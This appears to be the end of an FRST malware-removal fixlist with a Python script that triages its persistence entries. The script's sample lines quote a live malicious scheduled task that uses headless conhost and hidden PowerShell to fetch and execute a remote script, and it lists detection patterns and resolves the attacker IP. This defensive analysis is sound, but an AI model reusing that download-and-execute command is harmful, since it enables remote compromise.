# If you would like to delete preinstalled objects, add the argument /preinstalled next to the /clean argument
# If you would like to only scan with it, change the argument from /clean to /scan
New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:
CMD: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Warn" /f
CMD: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 1 /f
CMD: netsh int ip reset
CMD: netsh int ipv6 reset
CMD: ipconfig /flushDNS
CMD: netsh winsock reset catalog
C:\Users\CurrentUserName\AppData\Local\Temp\*
C:\Windows\Temp\*
C:\Windows\SystemTemp\*
EmptyTemp:
End::
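The entries marked <==== ATTENTION above are the point of the fix: an autostart whose folder is named mm.exe, and two scheduled tasks that launch a signed conhost.exe with --headless so it can quietly start powershell.exe, which in turn fetches and Invoke-Expressions a script from a shortened IP literal. The following is an added example, not part of the fixlist and not an FRST feature: it parses the Run: and Task: line shapes as they appear in the log, flags those traits, and expands the abbreviated IP the way inet_aton() would (the last dotted component fills the remaining bytes, so "79.8141710" is a valid 4-byte address). The field regex and the scoring heuristics are this example's own assumptions about the FRST format; the sample lines are copied from the fixlist, with the user SID shortened.

```python
"""Triage of FRST persistence entries: added example, not part of the fixlist above.

Parses the Run: and Task: line shapes seen in the log, flags the traits that make the
"Media Info Service" and "Google Compatibility Appraiser" entries stand out, and expands
the shortened IP literal in the PowerShell payload. The field regex and the heuristics
are this example's own assumptions about the FRST format, not an FRST API.
"""
import re

# Sample input: three entries copied from the fixlist above, trimmed (the user SID is
# shortened). The third is an orphaned but ordinary task, kept as a negative control.
SAMPLE = [
    r'HKU\S-1-5-21-...-1001\...\Run: [Media Info Service] => C:\Users\marle\mm.exe\MediaInfoService.exe [2083928 2026-04-26] (Tenorshare (Hongkong) Limited -> Tenorshare) <==== ATTENTION',
    r'Task: {5E751CBB-B664-4D96-A147-71C33C4D4BFF} - System32\Tasks\Google Compatibility Appraiser CL_NCL_581fdfb9e67e5b54 => C:\Windows\system32\conhost.exe [1003520 2026-04-15] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION',
    r'Task: {077BA067-7C15-40F0-B22E-C9DC2A54B4A2} - System32\Tasks\Microsoft\Windows\Location\Notifications => %windir%\System32\LocationNotificationWindows.exe (No File)',
]

# One regex for both shapes: "<hive>\...\Run: [name] => exe [size date] (signer)" and
# "Task: {guid} - System32\Tasks\name => exe [size date] (signer) -> args". Lazy groups
# plus the anchored tail let it cope with nested parentheses inside the signer field.
ENTRY_RE = re.compile(
    r"^(?:HKU\\.*?\\Run: \[(?P<run_name>[^\]]+)\]"
    r"|Task: \{(?P<guid>[0-9A-Fa-f-]+)\} - System32\\Tasks\\(?P<task_name>.+?)) => "
    r"(?P<exe>.+?)(?: \[(?P<size>\d+) (?P<date>\d{4}-\d{2}-\d{2})\])?"
    r" \((?P<signer>.*?)\)(?: -> (?P<args>.*?))?(?P<flag> <==== ATTENTION)?$"
)

# Command-line traits worth a second look, matched against the task arguments.
ARG_TRAITS = [
    (r"--headless", "conhost --headless hides the child console window"),
    (r"-ExecutionPolicy Bypass|-ep Bypass", "execution policy bypass"),
    (r"-WindowStyle Hidden|-w Hidden", "hidden window"),
    (r"Invoke-RestMethod|Invoke-WebRequest|\b(?:irm|iwr)\b", "remote download"),
    (r"Invoke-Expression|\biex\b", "download-and-execute via Invoke-Expression"),
    (r"if\(!\(Get-Process", "payload gated on the absence of named processes"),
]

# Dotted literal with 2-4 components, not glued to a word or another dot (so "v1.0" is skipped).
IP_TOKEN_RE = re.compile(r"(?<![\w.])\d{1,3}(?:\.\d+){1,3}(?![\w.])")


def expand_shorthand_ip(token):
    """Expand the abbreviated IPv4 forms inet_aton() accepts ("79.8141710", "127.1",
    "2130706433", "0x7f.1") into canonical a.b.c.d; return None if it is not one."""
    parts = token.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [int(p, 16) if p.lower().startswith("0x")
                  else int(p, 8) if len(p) > 1 and p.startswith("0")
                  else int(p, 10) for p in parts]
    except ValueError:
        return None
    *head, tail = values
    tail_bytes = 4 - len(head)          # the last component fills the remaining bytes
    if any(not 0 <= v < 256 for v in head) or not 0 <= tail < 256 ** tail_bytes:
        return None
    number = 0
    for v in head:
        number = (number << 8) | v
    number = (number << (8 * tail_bytes)) | tail
    return ".".join(str((number >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def triage(line):
    """Return a dict describing one Run:/Task: entry, or None if the line is another kind."""
    m = ENTRY_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    exe, args = d["exe"], d["args"] or ""
    reasons = []
    # A directory component that ends in .exe (here C:\Users\marle\mm.exe\) is a folder
    # dressed up as a file; autostarts under \Users\ run from user-writable locations.
    if any(p.lower().endswith(".exe") for p in exe.split("\\")[:-1]):
        reasons.append("directory named like an executable")
    if re.search(r"\\Users\\", exe, re.I):
        reasons.append("autostart binary in a user-writable path")
    for pattern, why in ARG_TRAITS:
        if re.search(pattern, args, re.I):
            reasons.append(why)
    if exe.lower().endswith("conhost.exe") and re.search(r"powershell\.exe|cmd\.exe", args, re.I):
        reasons.append("signed Microsoft host used as a proxy for a second interpreter")
    ips = [ip for ip in map(expand_shorthand_ip, IP_TOKEN_RE.findall(args)) if ip]
    return {"name": d["run_name"] or d["task_name"], "exe": exe, "signer": d["signer"],
            "reasons": reasons, "ips": ips}


if __name__ == "__main__":
    for entry in map(triage, SAMPLE):
        print(f"{entry['name']}: {entry['exe']} ({entry['signer']})")
        for r in entry["reasons"]:
            print("   -", r)
        for ip in entry["ips"]:
            print("   - contacts", ip)
```

Run against the three sample lines, the Run entry is flagged for its path alone, the conhost task collects every argument trait plus the proxy-launch finding and resolves the payload host to 79.124.59.142, and the orphaned LocationNotificationWindows task produces no findings. Feed it the whole FRST Addition.txt and the None returns simply skip the line kinds it does not model.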